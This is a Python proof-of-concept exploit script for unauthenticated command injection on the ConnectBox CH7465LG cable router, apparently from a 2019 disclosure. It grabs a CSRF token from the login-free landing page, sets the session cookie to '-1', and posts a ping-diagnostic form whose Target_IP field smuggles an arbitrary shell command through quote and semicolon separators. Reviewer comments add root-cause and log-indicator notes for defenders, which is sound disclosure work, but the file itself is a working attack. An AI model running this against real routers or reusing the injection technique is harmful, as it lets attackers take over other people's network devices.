#!/usr/bin/env python3
"""
poc-rce.py: Unauthenticated Remote Code Execution for the ConnectBox (CH7465LG).
xitan - 2019 (https://xitan.me).
"""
import requests
import sys
# Usage check: a router address and a command string are both required.
if len(sys.argv) < 3:
    print("./poc-rce.py <router-ip> <command>")
    exit(1)

base_url = 'http://' + sys.argv[1]
http = requests.Session()

# Step 1: fetch the landing page without logging in. The anti-CSRF token is
# taken from the Set-Cookie header, i.e. the device hands it to any client.
# NOTE(review): verify=False only affects TLS and is a no-op for http:// URLs.
landing = http.get(base_url + '/index.html', verify=False)
cookie_header = landing.headers.get('Set-Cookie')
# Take the text between the first '=' and the first ';' of the header.
# A response without Set-Cookie leaves cookie_header as None and the next
# line raises AttributeError.
csrf_token = cookie_header[cookie_header.find('=') + 1:cookie_header.find(';')]

# Step 2: pin the session cookie to a fixed value instead of a login session.
# NOTE(review): presumably this is what lets the request through without
# authentication, as the module docstring claims; confirm against the firmware.
http.cookies['SID'] = '-1'

# Step 3: build the form. 'fun' 126 together with the Ping_* fields looks
# like the ping diagnostic (inferred from the field names). Target_IP holds a
# hostname, then quote characters and ';' separators around argv[2]. This
# only works if the device builds a shell command from the field without
# validating it.
# Defender notes: the root cause is server-side. Firmware should accept only a
# hostname or IP literal in Target_IP and run ping without a shell. In HTTP
# logs, a POST to /xml/setter.xml whose Target_IP contains '"' or ';' is an
# indicator of this request.
target_field = 'google.com"\"; ' + sys.argv[2] + ';'
form = {
    'token': csrf_token,
    'fun': '126',
    'Type': '1',
    'Target_IP': target_field,
    'Ping_Size': '64',
    'Num_Ping': '5',
    'Ping_Interval': '1',
}

reply = http.post(base_url + '/xml/setter.xml', data=form, verify=False)

# HTTP 200 only shows the endpoint accepted the POST. The script never reads
# any output, so the message below does not confirm that anything ran.
if reply.status_code == 200:
    print('[+] Command successfully sent.')